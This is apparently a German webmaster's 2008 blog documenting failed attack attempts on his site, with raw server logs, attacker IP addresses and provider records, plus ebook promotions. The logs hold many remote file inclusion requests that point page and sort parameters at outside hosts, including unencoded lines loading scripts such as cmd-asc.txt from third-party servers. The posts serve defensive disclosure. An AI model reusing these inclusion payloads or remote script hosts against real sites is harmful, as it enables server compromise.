Hallo liebe Leser,
das neue eBook Hacker Reports 01/2008 ist seit März verfügbar.
Sichern Sie sich dieses Exemplar, das nur der erste Teil einer neuen Serie ist, die nun jedes Quartal erscheint.
Hier geht es zum Shop:
Viele Grüsse
Der Webmaster
Hacker Reports Attacks Information about stupid Hacker Attacks. Hier finden Sie Infos über die dümmsten Amateure unter den Hackern. Sie hinterlassen sichbare Spuren, die hier detailliert dokumentiert werden. :-)
Hallo liebe Leser,
das neue eBook Hacker Reports 01/2008 ist seit März verfügbar.
Sichern Sie sich dieses Exemplar, das nur der erste Teil einer neuen Serie ist, die nun jedes Quartal erscheint.
Hier geht es zum Shop:
Viele Grüsse
Der Webmaster
Hallo liebe Leser,
das neue eBook Hacker Reports 01/2008 gibt es nun, nur im Mai zum Einführungspreis.
Sichern Sie sich dieses Exemplar, das nur der erste Teil einer neuen Serie ist, die nun jedes Quartal erscheint.
Hier geht es zum Shop:
Viele Grüsse
Der Webmaster
Hallo liebe Leser,
es folgt in Kürze eine sehr interessante eBook-Serie, auf die kein Webmaster verzichten sollte.
Die Serie beinhaltet z. B. Beispiele, wie Sie selber auf einfachen Wege eine Protokollierung auf Ihre Website bringen können, gefolgt von weiteren Beispielen, wie z. B. eine fertige .htaccess, die dann bestimmte Netzwerke sperrt, auf die man eh verzichten kann.
Natürlich als Add-On, werden in diesem eBook die Dümmsten unter den Hackern detailliert mit Datum, Uhrzeit und IP geoutet. :-)
Mit den detaillierten Protokollauszügen wird Ihnen gezeigt, wie Sie diese Hacking-Angriffe erkennen und viele davon auch abwehren können.
Wie sieht es mit Ihrem Portal aus, egal ob Forum, Shop oder Homepage? Wie sicher ist Ihr Portal?
Diese und viele weitere Fragen werden in der eBook-Serie beantwortet.
Verpassen Sie nicht den Starttermin der ersten Ausgabe am 05.04.08.
Einfach ein absolutes MUSS für jeden Webmaster!
Am 18.03.08 ging es dann weiter, die Amateure versuchten weiterhin erfolglos, mein Portal zu hacken.
Warnung!!! Kommen Sie bitte nicht auf die Idee, durch Ersetzen von %3A%2F%2F und %2 durch die entsprechenden Zeichen, die URL´s aufzurufen, die als Sprungbrett verwendet wurden, es verbirgt sich evtl. immer noch schadhafter Code dahinter!
Der erste Versuch am 18.03.08
Der Amateur, der hier mittels seiner IP 222.255.3.68 seine Spur hinterlies, kam über folgenden Provider:
inetnum: 222.255.0.0 - 222.255.3.255Hier das Protokoll:
18.03.08, 16:58:05, 222.255.3.68, /index.php?page=services/osData/php121/php121db.php?Der zweite Versuch am 18.03.08
Der Amateur, der hier mittels seiner IP 88.191.26.64 seine Spur hinterlies, kam über folgenden Provider:
inetnum: 88.191.3.0 - 88.191.248.255Hier das Protokoll, der hat sich ja richtig Mühe gegeben aber das tut ein blindes Huhn ja auch:
18.03.08, 21:34:20, 88.191.26.64, /index.php?page=http%3A%2F%2Fwww.agv-schaafheim.de%2F
gallery%2Fdata%2Fmedia%2Fnexa%2Fzevela%2F
18.03.08, 21:34:22, 88.191.26.64, /index.php?page=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b
%2Fpages%2Fgodot%2Feridehi%2F
18.03.08, 21:34:23, 88.191.26.64, /index.php?page=http%3A%2F%2Fwww.polisgrandhotel.gr%2F
_cm_admin%2Fmaillist%2Feditor%2Fplugins%2Fcore%2Fdialogs%2Fqunik%2Futanac%2F
18.03.08, 21:34:35, 88.191.26.64, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
fabcraft.co.uk%2Fforum%2Fugak%2Fmiketat%2F
18.03.08, 21:34:36, 88.191.26.64, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
tcmforum.com%2Fweb%2Fsal%2Fyuveli%2F
18.03.08, 21:34:37, 88.191.26.64, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
clubnataciotortosa.com%2FUserFiles%2FFile%2Fedut%2Fjezin%2F
18.03.08, 21:34:39, 88.191.26.64, /index.php?page=articles
18.03.08, 21:34:39, 88.191.26.64, /index.php?page=showarticle&articleid=http%3A%2F%2Fsites.
redskycreative.com%2Fcanyonlakechurch%2Fjolalu%2Fbuq%2F
18.03.08, 21:34:40, 88.191.26.64, /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.
soeasywebsite.com%2Fsoeasycasino%2Fenosucu%2Fijani%2F
18.03.08, 21:34:41, 88.191.26.64, /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.
landisempach-emmen.ch%2Faktionen%2Fimage%2Fezu%2Fotitob%2F
18.03.08, 21:34:42, 88.191.26.64, /index.php?page=privacy
18.03.08, 21:34:44, 88.191.26.64, /?orderby=http%3A%2F%2Fwww.centralbalkannationalpark.org
%2Fde%2Fjage%2Fcevoyi%2F&sortorder=asc
18.03.08, 21:34:44, 88.191.26.64, /?orderby=http%3A%2F%2Fwww.centralbalkannationalpark.org
%2Fde%2Fjage%2Fcevoyi%2F&sortorder=asc
18.03.08, 21:34:45, 88.191.26.64, /?orderby=http%3A%2F%2Fctot.ru%2Fsts%2Fst22.files%2Fcusipu
%2Fhidola%2Fapa%2F&sortorder=asc
18.03.08, 21:34:45, 88.191.26.64, /?orderby=gender&sortorder=http%3A%2F%2Fwww.planet-
pictures.de%2Fcontent_system%2Fola%2Fitil%2F
18.03.08, 21:34:46, 88.191.26.64, /?orderby=gender&sortorder=http%3A%2F%2Fhonamfishing.co.kr
%2Fphpmysqladmin%2Flibraries%2Fnov%2Fwulosu%2F
18.03.08, 21:34:46, 88.191.26.64, /?orderby=gender&sortorder=http%3A%2F%2Fwww.marsbook.co.kr
%2Fmain%2Fcreated%2Fproduct%2F2%2Fmumas%2Fohalupa%2F
18.03.08, 21:34:47, 88.191.26.64, /index.php?page=terms_of_use
18.03.08, 21:34:48, 88.191.26.64, /index.php?page=showarticle&articleid=1
18.03.08, 21:34:48, 88.191.26.64, /?orderby=gender&sortorder=asc
18.03.08, 21:34:49, 88.191.26.64, /?orderby=sincedate&sortorder=asc
Der dritte Versuch am 18.03.08
Der Amateur, der hier mittels seiner IP 209.62.86.4 seine Spur hinterlies, kam über folgenden Provider:
OrgName: ThePlanet.com Internet Services, Inc.18.03.08, 22:27:03, 209.62.86.4, /index.php?page=http%3A%2F%2F
www.sanyoclim.fr%2Fextension%2Fezodf%2Fedidu%2Feyep%2F
18.03.08, 22:27:05, 209.62.86.4, /index.php?page=http%3A%2F%2Fsinzinuri.com%2Fimsi%2Fdb%2F
pic%2Fhuv%2Fabey%2F
18.03.08, 22:27:06, 209.62.86.4, /index.php?page=http%3A%2F%2Fwww.zetesis.biz%2FLMR%2Fade
%2Fzupe%2F
18.03.08, 22:27:08, 209.62.86.4, /index.php?page=shownews&newsid=
http%3A%2F%2Fwww.soeasywebsite.com%2Fsoeasycasino%2Fenosucu
%2Fijani%2F
18.03.08, 22:27:10, 209.62.86.4, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.blankner
.ocps.net%2Fmedia%2Fimages%2Fefepi%2Fasopuy%2F
18.03.08, 22:27:11, 209.62.86.4, /index.php?page=shownews&newsid=http%3A%2F%2Fchyngachanga
.ru%2Fcontent%2Fwuge%2Fasagula%2F
18.03.08, 22:27:16, 209.62.86.4, /index.php?page=login
18.03.08, 22:27:18, 209.62.86.4, /index.php?page=shownews&newsid=6
18.03.08, 22:27:23, 209.62.86.4, /?orderby=http%3A%2F%2Fwww.boomerbible.com%2Finstapunk%2F
MType%2Farchives%2Fajuq%2Fpiy%2F&sortorder=asc
18.03.08, 22:27:25, 209.62.86.4, /?orderby=http%3A%2F%2Fsites.redskycreative.com%2Fcanyonlakechurch
%2Fjolalu%2Fbuq%2F&sortorder=asc
18.03.08, 22:27:26, 209.62.86.4, /?orderby=http%3A%2F%2Fwww.snowmobile.ro%2Fphoto%2Fproduct%2F
_ugohoj%2Ferisa%2Fodiy%2Fwifefef%2F&sortorder=asc
18.03.08, 22:27:28, 209.62.86.4, /?orderby=city&sortorder=http%3A%2F%2Fwww.municipioxii.it%2F
sunnyway%2Figodoq%2Fbukosud%2F
18.03.08, 22:27:30, 209.62.86.4, /?orderby=city&sortorder=http%3A%2F%2Fwww.antwerpsupporter
.be%2Fsubscribe_2_me_to-delete%2Fsm%2Fexported_files1%2
Fmosupoz%2Fadusa%2Fojafujo%2Faweji%2F
18.03.08, 22:27:31, 209.62.86.4, /?orderby=city&sortorder=http%3A%2F%2Fwww.lamarguerite.ca%2F
Pat%2Fimages%2Fawixeta%2Fveb%2F
18.03.08, 22:27:33, 209.62.86.4, /index.php?page=terms_of_use
18.03.08, 22:27:42, 209.62.86.4, /?orderby=city&sortorder=asc
18.03.08, 22:27:44, 209.62.86.4, /?orderby=country&sortorder=asc
Auch für diesen Tag gilt, planloses Starten von irgendwelchen Tools, wo diese Dilettanten gar nicht so recht wissen, was sie da eigentlich tun. Schon der Versuch ist strafbar!
Viele Grüsse
Der Webmaster
Am 17.03.08 kamen dann die nächsten Idioten (Hacker) mit ihren amateurhaften Angriffsversuchen.
Warnung!!! Kommen Sie bitte nicht auf die Idee, durch Ersetzen von %3A%2F%2F und %2 durch die entsprechenden Zeichen, die URL´s aufzurufen, die als Sprungbrett verwendet wurden, es verbirgt sich evtl. immer noch schadhafter Code dahinter!
Der erste Versuch am 17.03.08
Der Amateur, der hier mittels seiner IP 165.138.51.197 seine Spur hinterlies, kam über folgenden Provider:
OrgName: Indiana Department of EducationDer zweite Versuch am 17.03.08
Der Amateur, der hier mittels seiner IP 202.181.99.83 seine Spur hinterlies, kam über folgenden Provider:
inetnum: 202.181.96.0 - 202.181.111.255
netname: SAKURA
descr: SAKURA Internet Inc.
descr: 1-8-14, Minami Honmachi, Chuo-ku, Osaka 541-0054, Japan
country: JP
17.03.08, 16:34:43, 202.181.99.83,
/index.php?page=services//osData/php121/php121db.php?
php121dir=http://contactcraze.com/cmd-asc.txt??
Der Amateur, der hier mittels seiner IP 86.197.68.38 seine Spur hinterlies, kam über folgenden Provider:
inetnum: 86.197.68.0 - 86.197.68.255Hier das Protokoll:
17.03.08, 19:08:44, 86.197.68.38, /index.php?page=services//osData/php121/php121db.php?
php121dir=http://www.germ2.com/www/z.txt???
Auch hier hat dieser Amateure keinen Schaden angerichtet, jedoch, schon der Versuch ist strafbar! Über so viel Dummheit, kann man echt nur grinsen. :-)
Viele Grüsse
Der Webmaster
Am 04.03.08 kam dann er nächsten Hacker mit einem amateurhaften Angriffsversuch.
Warnung!!! Kommen Sie bitte nicht auf die Idee, durch Ersetzen von %3A%2F%2F und %2 durch die entsprechenden Zeichen, die URL´s aufzurufen, die als Sprungbrett verwendet wurden, es verbirgt sich evtl. immer noch schadhafter Code dahinter!
Der Versuch am 04.03.08
Der Amateur, der hier mittels seiner IP 67.15.191.24 seine Spur hinterlies, kam über folgenden Provider:
OrgName: ThePlanet.com Internet Services, Inc.Hier das Protokoll:
OrgID: TPCM
Address: 315 Capitol
Address: Suite 205
City: Houston
StateProv: TX
NetRange: 67.15.0.0 - 67.15.255.255
04-03-08 / 10:47:05 - 67.15.191.24 - /
04-03-08 / 10:47:07 - 67.15.191.24 - /index.php?page=http%3A%2F%2Fwww.northfans.ch%2Fforum%2F
admin%2Fsettings%2Fgucor%2Fujusu%2F
04-03-08 / 10:47:08 - 67.15.191.24 - /index.php?page=http%3A%2F%2Fwww.felixtorresycia.com%2F
admin%2Fcorreo%2Fenaq%2Fecib%2F
04-03-08 / 10:47:09 - 67.15.191.24 - /index.php?page=http%3A%2F%2Fwww.thoseguysfilms.com%2F
forums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F
04-03-08 / 10:47:13 - 67.15.191.24 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F
04-03-08 / 10:47:14 - 67.15.191.24 - /index.php?page=shownews&newsid=http%3A%2F%2Fsahel55.com%2F
articles%2Fomaduro%2Fkimumid%2F
04-03-08 / 10:47:15 - 67.15.191.24 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.electrofed
.com%2F_app%2Fefc%2Fodoqu%2Fferus%2F
04-03-08 / 10:47:18 - 67.15.191.24 - /index.php?page=allnews
04-03-08 / 10:47:21 - 67.15.191.24 - /index.php?page=faq
04-03-08 / 10:47:22 - 67.15.191.24 - /index.php?page=login
04-03-08 / 10:47:24 - 67.15.191.24 - /?orderby=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin
%2Fsettings%2Fgucor%2Fujusu%2F&sortorder=asc
04-03-08 / 10:47:25 - 67.15.191.24 - /?orderby=http%3A%2F%2Fsans-packing.ru%2Fimg%2Fjipeqap
%2Fehudute%2F&sortorder=asc
04-03-08 / 10:47:26 - 67.15.191.24 - /?orderby=http%3A%2F%2Fsans-packing.ru%2Fimg%2Fjipeqap
%2Fehudute%2F&sortorder=asc
04-03-08 / 10:47:27 - 67.15.191.24 - /?orderby=city&sortorder=http%3A%2F%2Fsahel55.com%2Farticles
%2Fomaduro%2Fkimumid%2F
04-03-08 / 10:47:28 - 67.15.191.24 - /?orderby=city&sortorder=http%3A%2F%2Fwww.obrasmecanicasch
.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F
04-03-08 / 10:47:29 - 67.15.191.24 - /?orderby=city&sortorder=http%3A%2F%2Fwww.elettrodataservice.it
%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F
04-03-08 / 10:47:31 - 67.15.191.24 - /index.php?page=services
04-03-08 / 10:47:32 - 67.15.191.24 - /index.php?page=privacy
04-03-08 / 10:47:36 - 67.15.191.24 - /?orderby=city&sortorder=asc
04-03-08 / 10:47:37 - 67.15.191.24 - /?orderby=gender&sortorder=asc
Viele Grüsse
Der Webmaster
Am 03.03.08 ging es dann munter weiter, mit den amateurhaften Angriffsversuchen.
Warnung!!! Kommen Sie bitte nicht auf die Idee, durch Ersetzen von %3A%2F%2F und %2 durch die entsprechenden Zeichen, die URL´s aufzurufen, die als Sprungbrett verwendet wurden, es verbirgt sich evtl. immer noch schadhafter Code dahinter!
Der erste Versuch am 03.03.08
Der Amateur, der hier mittels seiner IP 213.232.89.31 seine Spur hinterlies, kam über folgenden Provider:
inetnum: 213.232.89.0 - 213.232.89.255
netname: GNX-NETWORK
descr: GNX Network Ltd. Second Allocation
country: GB
address: London
Hier das Protokoll:
03-03-08 / 16:09:54 - 213.232.89.31 - /
03-03-08 / 16:09:55 - 213.232.89.31 - /index.php?page=http%3A%2F%2Fwww.felixtorresycia.com%2F
admin%2Fcorreo%2Fenaq%2Fecib%2F
03-03-08 / 16:09:57 - 213.232.89.31 - /index.php?page=http%3A%2F%2Fwww.thoseguysfilms.com%2F
forums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F
03-03-08 / 16:09:58 - 213.232.89.31 - /index.php?page=http%3A%2F%2Fwww.northfans.ch%2Fforum%2F
admin%2Fsettings%
2Fgucor%2Fujusu%2F
03-03-08 / 16:10:03 - 213.232.89.31 - /index.php?page=shownews&newsid=http%3A%2F%2Fsans-packing.
ru%2Fimg%2Fjipeqap%2Fehudute%2F
03-03-08 / 16:10:04 - 213.232.89.31 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.felixtorr
esycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F
03-03-08 / 16:10:05 - 213.232.89.31 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.municipi
oxii.it%2Fsunnyway%2Feheqebi%2Fjahibop%2F
03-03-08 / 16:10:09 - 213.232.89.31 - /index.php?page=allnews
03-03-08 / 16:10:11 - 213.232.89.31 - /index.php?page=privacy
03-03-08 / 16:10:13 - 213.232.89.31 - /index.php
03-03-08 / 16:10:14 - 213.232.89.31 - /index.php?page=articles
03-03-08 / 16:10:16 - 213.232.89.31 - /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.altaiseer
-eg.com%2Far%2Farticles%2Fjed%2Fumut%2F
03-03-08 / 16:10:20 - 213.232.89.31 - /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.northfans
.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F
03-03-08 / 16:10:22 - 213.232.89.31 - /index.php?page=showarticle&articleid=http%3A%2F%2Fsahel55.com%2F
articles%2Fomaduro%2Fkimumid%2F
03-03-08 / 16:10:29 - 213.232.89.31 - /index.php?page=shownews&newsid=3
03-03-08 / 16:10:30 - 213.232.89.31 - /index.php?page=faq
03-03-08 / 16:10:31 - 213.232.89.31 - /index.php?page=showarticle&articleid=1
Am gleichen Tag folgte dann ein zweiter Angriff.
Der Amateur, der hier mittels seiner IP 81.25.195.225 seine Spur hinterlies, kam über folgenden Provider:
inetnum: 81.25.195.224 - 81.25.195.239
netname: ITEMA-NET
descr: ITEMA
descr: Paris
country: FR
Hier das Protokoll:
03-03-08 / 17:13:31 - 81.25.195.225 - /
03-03-08 / 17:13:33 - 81.25.195.225 - /index.php?page=http%3A%2F%2Fwww.channelnewsperu.com%2F
imagenes%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F
03-03-08 / 17:13:35 - 81.25.195.225 - /index.php?page=http%3A%2F%2Fwww.altaiseer-eg.com%2Far%2F
articles%2Fjed%2Fumut%2F
03-03-08 / 17:13:39 - 81.25.195.225 - /index.php?page=http%3A%2F%2Fwww.felixtorresycia.com%2F
admin%2Fcorreo%2Fenaq%2Fecib%2F
03-03-08 / 17:13:49 - 81.25.195.225 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.cjp.spb
.ru%2Fen%2Ftis%2Fleboma%2F
03-03-08 / 17:13:50 - 81.25.195.225 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.electro
fed.com%2F_app%2Fefc%2Fodoqu%2Fferus%2F
03-03-08 / 17:13:51 - 81.25.195.225 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.felixtor
resycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F
03-03-08 / 17:13:53 - 81.25.195.225 - /?orderby=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin
%2Flibraries%2Foduzov%2Fneloze%2F&sortorder=asc
03-03-08 / 17:13:54 - 81.25.195.225 - /?orderby=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes
%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F&sortorder=asc
03-03-08 / 17:13:55 - 81.25.195.225 - /?orderby=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin
%2Flibraries%2Foduzov%2Fneloze%2F&sortorder=asc
03-03-08 / 17:13:56 - 81.25.195.225 - /?orderby=age&sortorder=http%3A%2F%2Fwww.municipioxii.it%2F
sunnyway%2Feheqebi%2Fjahibop%2F
03-03-08 / 17:13:57 - 81.25.195.225 - /?orderby=age&sortorder=http%3A%2F%2Fwww.obrasmecanicasch
.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F
03-03-08 / 17:13:58 - 81.25.195.225 - /?orderby=age&sortorder=http%3A%2F%2Fwww.electrofed.com%2F
_app%2Fefc%2Fodoqu%2Fferus%2F
03-03-08 / 17:13:58 - 81.25.195.225 - /index.php?page=privacy
03-03-08 / 17:13:59 - 81.25.195.225 - /index.php?page=faq
03-03-08 / 17:14:02 - 81.25.195.225 - /index.php
03-03-08 / 17:14:03 - 81.25.195.225 - /index.php?page=allnews
03-03-08 / 17:14:04 - 81.25.195.225 - /index.php?page=terms_of_use
03-03-08 / 17:14:06 - 81.25.195.225 - /?orderby=age&sortorder=asc
Alle Guten Dinge sind drei, hier der dritte Idiot.
Der Amateur, der hier mittels seiner IP 83.246.95.76 seine Spur hinterlies, kam über folgenden Provider:
inetnum: 83.246.94.0 - 83.246.95.255
netname: SERVERPOOL-VPS1-NET
descr: VPS Serverpool
descr: Hannover, Germany
country: DE
Hier das Protokoll:
03-03-08 / 20:44:21 - 83.246.95.76 - /
03-03-08 / 20:44:24 - 83.246.95.76 - /index.php?page=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2F
pages%2Filosi%2Fdohigal%2F
03-03-08 / 20:44:25 - 83.246.95.76 - /index.php?page=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch
%2Fimg%2Fitofu%2Fviroja%2F
03-03-08 / 20:44:25 - 83.246.95.76 - /index.php?page=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2F
correo%2Fenaq%2Fecib%2F
03-03-08 / 20:44:29 - 83.246.95.76 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.elettrodata
service.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F
03-03-08 / 20:44:30 - 83.246.95.76 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.obrasmecani
casch.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F
03-03-08 / 20:44:31 - 83.246.95.76 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.elettrodata
service.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F
03-03-08 / 20:44:32 - 83.246.95.76 - /index.php?page=faq
03-03-08 / 20:44:33 - 83.246.95.76 - /index.php?page=allnews
03-03-08 / 20:44:34 - 83.246.95.76 - /index.php?page=services
03-03-08 / 20:44:36 - 83.246.95.76 - /index.php?page=articles
03-03-08 / 20:44:37 - 83.246.95.76 - /index.php?page=showarticle&articleid=http%3A%2F%2Fsahel55.com
%2Farticles%2Fomaduro%2Fkimumid%2F
03-03-08 / 20:44:38 - 83.246.95.76 - /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.psikoloji
kyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F
03-03-08 / 20:44:38 - 83.246.95.76 - /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.altaiseer
-eg.com%2Far%2Farticles%2Fjed%2Fumut%2F
03-03-08 / 20:44:42 - 83.246.95.76 - /index.php?page=showarticle&articleid=1
Auch hier hat keiner der Amateure Schaden angerichtet, jedoch, schon der Versuch ist strafbar!
Viele Grüsse
Der Webmaster
Der erste Versuch, am 02.03.08 fingen die Hacking-Angriffe auf eines meiner Portale an.
Warnung!!! Kommen Sie bitte nicht auf die Idee, durch Ersetzen von %3A%2F%2F und %2 durch die entsprechenden Zeichen, die URL´s aufzurufen, die als Sprungbrett verwendet wurden, es verbirgt sich evtl. immer noch schadhafter Code dahinter!
Der Amateur, der hier mittels seiner IP 209.23.126.65 seine Spur hinterlies, kam über folgenden Provider:
OrgName: Logical Net Corporation
OrgID: LNC
Address: 1593 Central Ave.
City: Albany
StateProv: NY
PostalCode: 12205
Country: US
NetRange: 209.23.0.0 - 209.23.127.255
Hier das Protokoll:
02-03-08 / 20:23:33 - 209.23.126.65 - /index.php?page=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2
F&newsid=3
02-03-08 / 20:23:36 - 209.23.126.65 - /index.php?page=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2
FsubSilver%2Fimages%2Fuza%2Flaqipu%2F&newsid=3
02-03-08 / 20:23:37 - 209.23.126.65 - /index.php?page=http%3A%2F%2Fwww.electrofed.com%2F_app%2Fefc%2Fodoqu%2F
ferus%2F&newsid=3
02-03-08 / 20:23:38 - 209.23.126.65 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%
2Fpages%2Filosi%2Fdohigal%2F
02-03-08 / 20:23:40 - 209.23.126.65 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforu
ms%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F
02-03-08 / 20:23:41 - 209.23.126.65 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2F
leboma%2F
02-03-08 / 20:23:56 - 209.23.126.65 - /index.php?page=shownews&newsid=3
02-03-08 / 20:23:57 - 209.23.126.65 - /index.php
02-03-08 / 20:24:00 - 209.23.126.65 - /?orderby=http%3A%2F%2Fwww.municipioxii.it%2Fsunnyway%2Feheqebi%2Fjahibop%
2F&sortorder=asc
02-03-08 / 20:24:01 - 209.23.126.65 - /?orderby=http%3A%2F%2Fsinzinuri.com%2Fimsi%2Fdb%2Fpic%2Fbezefi%2Fugoye%2
F&sortorder=asc
02-03-08 / 20:24:02 - 209.23.126.65 - /?orderby=http%3A%2F%2Fsans-packing.ru%2Fimg%2Fjipeqap%2Fehudute%2F&sortor
der=asc
02-03-08 / 20:24:02 - 209.23.126.65 - /?orderby=country&sortorder=http%3A%2F%2Fwww.elettrodataservice.it%2Ffoto_artic
oli%2Fonoda%2Fiyegimi%2F
02-03-08 / 20:24:04 - 209.23.126.65 - /?orderby=country&sortorder=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Flebom
a%2F
Am gleichen Tag folgte dann ein zweiter Angriff.
Der Amateur, der hier mittels seiner IP 72.232.44.170 seine Spur hinterlies, kam über folgenden Provider:
OrgName: Layered Technologies, Inc.
OrgID: LAYER-3
Address: 5085 W Park Blvd
Address: Suite 700
City: Plano
StateProv: TX
PostalCode: 75093
Country: US
NetRange: 72.232.0.0 - 72.233.127.255
02-03-08 / 21:11:30 - 72.232.44.170 - /
02-03-08 / 21:11:33 - 72.232.44.170 - /index.php?page=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicac
iones%2Ffotos%2Fnepicu%2Fegul%2F
02-03-08 / 21:11:34 - 72.232.44.170 - /index.php?page=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicac
iones%2Ffotos%2Fnepicu%2Fegul%2F
02-03-08 / 21:11:36 - 72.232.44.170 - /index.php?page=http%3A%2F%2Fwww.interkonet.com%2Fenxicmarxant%2Fweb%2Fe
ditor%2Fscripts%2Ficons%2Fcatizi%2Farofo%2F
02-03-08 / 21:11:47 - 72.232.44.170 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.felixtorresycia.com%2Fadm
in%2Fcorreo%2Fenaq%2Fecib%2F
02-03-08 / 21:11:51 - 72.232.44.170 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.heaven-house.kz%2Ftempl
ates_c%2Fsexes%2Fafacub%2F
02-03-08 / 21:11:52 - 72.232.44.170 - /index.php?page=shownews&newsid=http%3A%2F%2Fwww.interkonet.com%2Fenxicma
rxant%2Fweb%2Feditor%2Fscripts%2Ficons%2Fcatizi%2Farofo%2F
02-03-08 / 21:11:57 - 72.232.44.170 - /index.php?page=articles
02-03-08 / 21:12:02 - 72.232.44.170 - /index.php?page=showarticle&articleid=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmy
sqladmin%2Flibraries%2Foduzov%2Fneloze%2F
02-03-08 / 21:12:04 - 72.232.44.170 - /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.elettrodataservice.it%2F
foto_articoli%2Fonoda%2Fiyegimi%2F
02-03-08 / 21:12:06 - 72.232.44.170 - /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.psikolojikyardim.org%2F
etkinlik%2Finclude%2Feto%2Fnixaz%2F
02-03-08 / 21:12:08 - 72.232.44.170 - /index.php?page=faq
02-03-08 / 21:12:10 - 72.232.44.170 - /index.php
02-03-08 / 21:12:16 - 72.232.44.170 - /?orderby=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fitofu%2F
viroja%2F&sortorder=asc
02-03-08 / 21:12:17 - 72.232.44.170 - /?orderby=http%3A%2F%2Fsinzinuri.com%2Fimsi%2Fdb%2Fpic%2Fbezefi%2Fugoye%2
F&sortorder=asc
02-03-08 / 21:12:19 - 72.232.44.170 - /?orderby=http%3A%2F%2Fwww.tureksfuar.com.tr%2Fjoomla%2Fmambots%2Fconten
t%2Fugi%2Fvipo%2F&sortorder=asc
02-03-08 / 21:12:20 - 72.232.44.170 - /?orderby=sincedate&sortorder=http%3A%2F%2Fwww.electrofed.com%2F_app%2Fefc
%2Fodoqu%2Fferus%2F
02-03-08 / 21:12:21 - 72.232.44.170 - /?orderby=sincedate&sortorder=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%
2Fcorreo%2Fenaq%2Fecib%2F
02-03-08 / 21:12:22 - 72.232.44.170 - /?orderby=sincedate&sortorder=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladm
in%2Flibraries%2Foduzov%2Fneloze%2F
02-03-08 / 21:12:24 - 72.232.44.170 - /index.php?page=login
02-03-08 / 21:12:29 - 72.232.44.170 - /index.php?page=showarticle&articleid=1
02-03-08 / 21:12:31 - 72.232.44.170 - /?orderby=sincedate&sortorder=asc
02-03-08 / 21:12:33 - 72.232.44.170 - /?orderby=age&sortorder=asc
Naja, es hat keiner der Amateure Schaden angerichtet, jedoch, schon der Versuch ist strafbar!
Viele Grüsse
Der Webmaster
Hallo liebe Leser,
da das amateurhafte Hacking in letzter Zeit zunimmt, werden hier diese Hacker mit Ihren Spuren, die sie dummerweise hinterlassen, geoutet. :-)
Was mich auch stört, ist die dumme Ignroranz einiger Provider (auch deutsche), die bei Meldung eines Hacking-Angriffs aus ihrem Netz, nicht reagieren.
Bei den letzten Angriffen haben 2 von 4 deutschen Providern z. B. überhaupt nicht reagiert. Naja, da kommt bei mir der Verdacht auf, dass die wohl jeden Kunden brauchen (auch Hacker), denn die zahlen ja auch die Gebühren.
Armes Deutschland, kann ich da nur sagen, denn durch diese Ignoranz werden Straftäter geschützt!
Das ist dann auch einer der Gründe gewesen, einen Blog aufzumachen, so dass die Informationen der Angriffe nun für jeden sichtbar sind.
Viele Grüsse
Der Webmaster
Hallo liebe Leser,
